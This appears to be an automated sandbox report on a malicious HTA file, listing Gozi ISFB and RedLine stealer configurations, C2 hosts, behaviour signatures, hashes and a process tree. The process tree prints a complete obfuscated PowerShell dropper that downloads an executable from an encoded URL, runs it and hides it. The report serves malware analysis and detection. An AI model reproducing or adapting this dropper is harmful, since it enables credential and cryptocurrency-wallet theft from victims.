Analysis

  • max time kernel
    109s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    05-08-2022 01:33

General

  • Target

    55.hta

  • Size

    12KB

  • MD5

    26ace4f34d7b5df03722125fe5280d4c

  • SHA1

    7b9e7c2c60e66ec42061752d707ab70c3c84187a

  • SHA256

    e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad

  • SHA512

    5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115

Malware Config

Extracted

Family

gozi_ifsb

Botnet

11111

C2

trackingg-protectioon.cdn1.mozilla.net

194.76.225.168

194.76.224.242

Attributes
  • base_path

    /fonts/

  • build

    250240

  • exe_type

    loader

  • extension

    .bak

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

redline

Botnet

bart

C2

80.66.87.52:2500

Attributes
  • auth_value

    7d4c7c8f7ce4a858768b38d88316bd46

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Users\Admin\AppData\Roaming\bartor.exe
        "C:\Users\Admin\AppData\Roaming\bartor.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:696
          • C:\Users\Admin\Downloads\WinZip.exe
            C:\Users\Admin\Downloads\WinZip.exe
            5⤵
            • Executes dropped EXE
            PID:1944
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1580
          • C:\Windows\SysWOW64\choice.exe
            choice /C Y /N /D Y /T 7
            5⤵
              PID:1444

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\bartor.exe

      Filesize

      494KB

      MD5

      0f2be4fe0362766dcf339d4c03326bc4

      SHA1

      69e26e9e75e8a8359d232d8e14318b9235e1a828

      SHA256

      2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529

      SHA512

      8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

    • C:\Users\Admin\AppData\Roaming\bartor.exe

      Filesize

      494KB

      MD5

      0f2be4fe0362766dcf339d4c03326bc4

      SHA1

      69e26e9e75e8a8359d232d8e14318b9235e1a828

      SHA256

      2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529

      SHA512

      8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

    • C:\Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

    • C:\Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

    • \Users\Admin\AppData\Roaming\bartor.exe

      Filesize

      494KB

      MD5

      0f2be4fe0362766dcf339d4c03326bc4

      SHA1

      69e26e9e75e8a8359d232d8e14318b9235e1a828

      SHA256

      2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529

      SHA512

      8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

    • \Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

    • \Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

    • memory/696-66-0x0000000000000000-mapping.dmp

    • memory/1136-54-0x0000000075681000-0x0000000075683000-memory.dmp

      Filesize

      8KB

    • memory/1444-84-0x0000000000000000-mapping.dmp

    • memory/1580-83-0x0000000000000000-mapping.dmp

    • memory/1876-57-0x0000000072740000-0x0000000072CEB000-memory.dmp

      Filesize

      5.7MB

    • memory/1876-55-0x0000000000000000-mapping.dmp

    • memory/1876-62-0x0000000072740000-0x0000000072CEB000-memory.dmp

      Filesize

      5.7MB

    • memory/1916-82-0x0000000000310000-0x0000000000316000-memory.dmp

      Filesize

      24KB

    • memory/1916-65-0x0000000000470000-0x0000000000488000-memory.dmp

      Filesize

      96KB

    • memory/1916-81-0x0000000000620000-0x0000000000664000-memory.dmp

      Filesize

      272KB

    • memory/1916-63-0x0000000000320000-0x00000000003A2000-memory.dmp

      Filesize

      520KB

    • memory/1916-59-0x0000000000000000-mapping.dmp

    • memory/1944-73-0x0000000000230000-0x0000000000330000-memory.dmp

      Filesize

      1024KB

    • memory/1944-74-0x00000000003A0000-0x00000000003AB000-memory.dmp

      Filesize

      44KB

    • memory/1944-75-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1944-76-0x0000000000610000-0x000000000061D000-memory.dmp

      Filesize

      52KB

    • memory/1944-79-0x0000000000230000-0x0000000000330000-memory.dmp

      Filesize

      1024KB

    • memory/1944-80-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1944-70-0x0000000000000000-mapping.dmp